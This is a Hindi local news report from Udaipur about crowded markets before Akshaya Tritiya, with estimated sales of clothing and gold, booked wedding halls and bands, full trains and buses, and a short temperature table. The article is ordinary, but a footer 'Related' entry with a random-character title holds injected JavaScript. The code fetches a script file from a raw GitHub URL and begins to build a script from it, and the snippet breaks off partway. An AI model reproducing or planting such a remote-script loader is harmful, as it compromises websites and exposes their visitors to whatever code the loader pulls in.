अक्षय तृतीया केे पहले बाजारों में उमड़े ग्राहक

Date:

xBL16_KOL_GOLD_G_BL_1430348f.jpg.pagespeed.ic.MfBgFVS0rnकरोड़ों का कारोबार हुआ
अ क्षय तृतीया के एक दिन पहले बाजार में जोरदार उठाव आया। भीषण गर्मी के बाद भी दिनभर दुकानों पर ग्राहकों की भीड़ रही। इस दौरान कपड़ा, किराना और सराफा में लगभग चार करोड़ से अधिक के कारोबार का अनुमान है। अक्षय तृतीया के अबुझ मुहुर्त में शांदियां और सामुहिक विवाह सम्मेलन इतने अधिक है कि लोगों के लिए होटल, धर्मशाला से लेकर घोड़ा और बैंड भी कम पड़ गए।
मददगार रिपोर्टर
उदयपुर। बाजार में उठाव तो पिछले तीन चार दिन से चल रहा है, लेकिन अक्षय तृतीया के एक दिन पहले बाजार में उठाव आया है; वह व्यापारियों की उम्मीद से ज्यादा है। बुधवार को शहर के मुख्य बाजार में भीड़-भाड़ के चलते कपड़ा, सर्राफा बाजार में दुकानों पर खड़े रहने तक की जगह नहीं मिल रही है। इन दिनों बाजारों में देर तक ग्राहकों की भीड़ है।
कपड़े मेें २० लाख की ग्राहकी
अक्षय तृतीया के एक दिन पहले तक कपड़ा बाजार में लोग दूल्हा-दुल्हन के कपड़े खरीदते दिखाई दिए। इसके अलावा साड़ी और विवाह के अन्य कपड़ों की खरीदी भी खूब हो रही है। लोगों ने रेडिमेट कपड़ों की जमकर खरीदी की। देर रात तक ग्राहक कपड़ा खरीदते रहे। चार्ली कलेक्शन के कमलेश जैन ने बताया के अक्षय तृतीया के अवसर पर बाजारों में ग्राहकों की भीड़ है। दूल्हें उनके लिए व उनके दोस्तों के लिए जमकर खरीददारी कर रहे हैं। एक अनुमान के आधार पर बाजार में लगभग २० लाख तक की ग्राहकी हुई है।
सर्राफा बाजार में डेढ़ करोड़ की बिक्री
अक्षय तृतीया से एक दिन पूर्व सर्राफा बाजार में सुबह से ही ग्राहकों की भीड़ रही। सुबह सर्राफा बाजार में सोने के दाम ३० हजार पांच सौ और चांदी के दाम ४३ हजार रुपए किलो के असपास थे। बाजार में ग्राहकी शुरू हुई, तो दाम से अधिक ग्राहकों को पंसद के सामान की चिंता थी। भीड़-भाड़ के चलते न तो दुकानदार अपने ग्राहकों को ठीक से सामान दिखा पा रहे थे और ना ही ग्राहक भी ठीक से जेवरात पसंद कर पा रहे थे। इसके बाद भी जल्दी में लोगों ने जमकर ग्राहकी की। एक सर्राफा व्यापारी ने बताया कि बुधवार को सर्राफा बाजार में लगभग डेढ़ करोड़ की बिक्री का अनुमान है।
जनरल स्टोर पर भी नहीं जगह
जनरल स्टोर की दुकानों पर शादी के सामान खरीदने वालो की भारी भीड़ रही। बाजार में दूल्हा-दुल्हन के शृृंगार का सामान, माला, कटार सहित विभिन्न प्रकार के सामानों की जमकर ग्राहकी हुई। दुकानदारों ने बताया कि इस बार जिस हिसाब से ग्राहकी हो रही है उसने कहीं पर भी गर्मी का असर दिखाई नहीं देता। ग्राहक पूरे उत्साह के साथ शादी के सामान की खरीद रहे हैं।
शादी-हाल, बैंड बुक
अक्षय तृतीय के दो दिवसीय लगन के चलते शहर के मैरिज गार्डन बुक हो गए। इस दौरान शादी कर रहे लोगों ने बताया कि मेरिज गार्डन के लिए उन्हें १५ हजार से २० हजार रुपए अधिक देना पड़ा। वहीं कुछ लोगों को तो गार्डन नहीं मिलने से खुले में टैंट लगाकर शादी समारोह करना पड़ेगा। इसी तरह घोड़ा और बैंड-बाजे की स्थिति रही। बैंड-बाजे और घोड़ा वालों के पास प्रति दो घंटे के हिसाब से तीन से चार बुकिंग है। इसी तरह जनरेटर वालों के पास एक दिन में दो तीन बुकिं ग है।
ट्रेनों और बसों में भी नहीं मिल रही जगह
अक्षय तृतीय के दो दिवसीय लगन के चलते बसें और टे्रनें भी फुल चल रही हैं। ग्रामीण रूट में चलने वाली बसों में तो यात्रियों को जगह नहीं मिल रही है। वहीं लोकल ट्रेनें भी फुल चल रही है। उदयपुर से भीलवाड़ व रतलाम वाली गाडिय़ों में तो लोकल में भी जगह मुश्किल से मिल रही है। यात्रियों ने बताया कि बस व ट्रेेनों में भीड़ ज्यादा है, लेकिन शादियों में जाने के लिए सफार करना पड़ रहा है।
28 अप्रैल: 39.5 न्यूनतम 24
29 अप्रैल. 41 न्यूनतम 24.2
30 अप्रैल: 41. न्यूनतम 27

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...